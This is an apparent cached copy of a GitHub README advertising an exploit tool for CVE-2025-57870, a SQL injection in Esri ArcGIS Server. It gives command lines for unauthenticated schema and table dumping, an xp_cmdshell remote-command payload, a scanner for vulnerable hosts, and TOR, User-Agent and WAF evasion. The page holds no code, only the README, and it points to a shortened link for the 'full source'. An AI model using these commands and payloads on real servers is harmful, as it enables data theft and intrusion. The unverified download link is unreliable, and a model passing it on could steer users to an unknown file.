Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-57870 PoC — Esri ArcGIS Server SQL注入漏洞

Source
https://github.com/ByteHawkSec/CVE-2025-57870-POC
Associated Vulnerability
Title:Esri ArcGIS Server SQL注入漏洞 (CVE-2025-57870)
Description:Esri ArcGIS Server是Esri公司的一个面向Web的可用于提供地理位置服务的企业级软件平台。 Esri ArcGIS Server 11.3版本、11.4版本和11.5版本存在SQL注入漏洞,该漏洞源于特定ArcGIS要素服务操作未经验证输入,可能导致SQL注入攻击。
Description
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in Esri ArcGIS Server
Readme
# Esri ArcGIS Server SQL Injection Exploit - CVE-2025-57870

This repository provides a professional-grade exploit for CVE-2025-57870, a critical SQL injection vulnerability in Esri ArcGIS Server versions 11.3, 11.4, and 11.5. The tool targets the Feature Service `/query` endpoint, enabling unauthenticated remote execution of arbitrary SQL commands on the underlying Enterprise Geodatabase. Designed for penetration testers and security researchers, it supports data exfiltration, modification, and potential RCE on certain database backends.  

**Note:** Full source code access - **[href](https://tinyurl.com/3zjbu33f)** . This repository contains core exploit logic and utilities for authorized testing.  

## Features
- Unauthenticated exploitation of ArcGIS Feature Services.
- Supports MSSQL, Oracle, and PostgreSQL backends.
- Modes: Error-based, blind (time-based), and out-of-band (OOB) injection.
- Built-in scanner for identifying vulnerable ArcGIS instances.
- Evasion techniques: Randomized delays, User-Agent rotation, proxy support (TOR/SOCKS).
- Post-exploitation: Schema enumeration, table dumping, and command execution.

## Repository Structure
- `sqli_exploit.py`: Main exploit script with modular injection logic.
- `scanner.py`: Network scanner to detect vulnerable ArcGIS servers.
- `payload_generator.py`: Generates custom SQL payloads for specific actions.
- `evasion_utils.py`: Evasion utilities for bypassing IDS/IPS.
- `db_backends/`: Backend-specific payload handlers (mssql.py, oracle.py, postgres.py).
- `config.yaml`: Configuration file for target, proxy, and logging settings.
- `requirements.txt`: Python dependencies.
- `exploited_data/`: Output directory for dumped data.
- `demo.mp4/`: A video instruction manual
## Prerequisites
- Python 3.8+
- Install dependencies: `pip install -r requirements.txt`

## Setup
1. Configure `config.yaml` with target details:
   ```yaml
   target:
     url: "https://target.com/ArcGIS/rest/services/ServiceName/FeatureServer/0/query"
     db_type: "mssql"  # Options: mssql, oracle, postgres
   proxy:
     enabled: false
     type: "socks5"
     address: "127.0.0.1:9050"
   logging:
     level: "debug"
     output_dir: "exploited_data"
   ```
2. Scan for vulnerable servers:  
   `python scanner.py --network 192.168.1.0/24 --port 6080`

## Usage
Run the exploit:  
`python sqli_exploit.py --target-url <URL> --mode blind --action dump_schema --output exploited_data/schema.json`

### Options
- `--target-url`: Full FeatureServer query URL (required).
- `--mode`: `error`, `blind`, or `oob` (default: error).
- `--action`: `dump_schema`, `dump_table`, `execute_cmd` (required).
- `--db-type`: `mssql`, `oracle`, or `postgres` (required).
- `--table`: Target table for `dump_table` action (optional).
- `--custom-payload`: Raw SQL payload for custom injections (optional).
- `--evade`: Enable evasion techniques (default: off).
- `--output`: Output file for results (default: exploited_data/output.json).

### Examples
1. Dump database schema (MSSQL):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --action dump_schema --db-type mssql --output schema.json`

2. Dump specific table (Oracle):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode blind --action dump_table --db-type oracle --table users --output users.json`

3. Attempt RCE (MSSQL xp_cmdshell):  
   `python sqli_exploit.py --target-url https://target.com/ArcGIS/rest/services/Service/FeatureServer/0/query --mode error --db-type mssql --custom-payload "; EXEC xp_cmdshell 'whoami' --" --output cmd_output.txt`

## Evasion Techniques
- `--evade`: Enables random delays (1-5s), User-Agent rotation, and proxy chaining.
- Proxy support: Configure TOR or SOCKS5 in `config.yaml`.
- Payload obfuscation: Automatic comment injection (e.g., `/**/`) to bypass WAFs.

## Get the exploit
### **[href](https://tinyurl.com/3zjbu33f)**
## Disclaimer
For authorized security testing only. Unauthorized use is illegal. The authors are not responsible for misuse or damages.  

##  Contact
For any questions or inquiries, please contact: bytehawkcorp@outlook.com
File Snapshot

 [4.0K]  /data/pocs/4c7835b3cef7417f950801ee45b1ab29e45a65c2
└── [4.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.